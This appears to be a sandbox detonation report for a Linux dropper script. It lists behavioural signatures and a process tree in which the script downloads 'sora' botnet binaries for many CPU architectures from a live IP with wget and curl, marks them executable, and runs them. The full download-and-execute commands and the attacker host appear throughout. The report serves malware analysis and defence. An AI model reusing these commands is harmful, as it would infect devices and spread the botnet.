N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh N/A

Processes

/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh

[/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86]

/bin/cat

[cat sora.x86]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-a23af2012a9c4325be1adc61f96c31ce-systemd-timedated.service-FpU7jx]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mips]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mips]

/bin/cat

[cat sora.mips]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-a23af2012a9c4325be1adc61f96c31ce-systemd-timedated.service-FpU7jx]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86_64]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86_64]

/bin/cat

[cat sora.x86_64]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-a23af2012a9c4325be1adc61f96c31ce-systemd-timedated.service-FpU7jx]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i468]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i468]

/bin/cat

[cat sora.i468]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-a23af2012a9c4325be1adc61f96c31ce-systemd-timedated.service-FpU7jx]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i686]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i686]

/bin/cat

[cat sora.i686]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mpsl]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mpsl]

/bin/cat

[cat sora.mpsl]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm4]

/bin/cat

[cat sora.arm4]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm5]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm5]

/bin/cat

[cat sora.arm5]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm6]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm6]

/bin/cat

[cat sora.arm6]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm7]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm7]

/bin/cat

[cat sora.arm7]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc]

/bin/cat

[cat sora.ppc]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc440fp]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc440fp]

/bin/cat

[cat sora.ppc440fp]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.m68k]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.m68k]

/bin/cat

[cat sora.m68k]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.sh4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.sh4]

/bin/cat

[cat sora.sh4]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-18 02:04

Reported

2024-10-18 02:06

Platform

debian9-mipsel-20240729-en

Max time kernel

28s

Max time network

29s

Command Line

[/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh N/A

Processes

/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh

[/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86]

/bin/cat

[cat sora.x86]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mips]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mips]

/bin/cat

[cat sora.mips]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86_64]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86_64]

/bin/cat

[cat sora.x86_64]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i468]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i468]

/bin/cat

[cat sora.i468]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i686]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i686]

/bin/cat

[cat sora.i686]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mpsl]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mpsl]

/bin/cat

[cat sora.mpsl]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm4]

/bin/cat

[cat sora.arm4]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm5]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm5]

/bin/cat

[cat sora.arm5]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm6]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm6]

/bin/cat

[cat sora.arm6]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm7]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm7]

/bin/cat

[cat sora.arm7]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc]

/bin/cat

[cat sora.ppc]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc440fp]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc440fp]

/bin/cat

[cat sora.ppc440fp]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.m68k]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.m68k]

/bin/cat

[cat sora.m68k]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.sh4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.sh4]

/bin/cat

[cat sora.sh4]

/bin/chmod

[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp

Files

N/A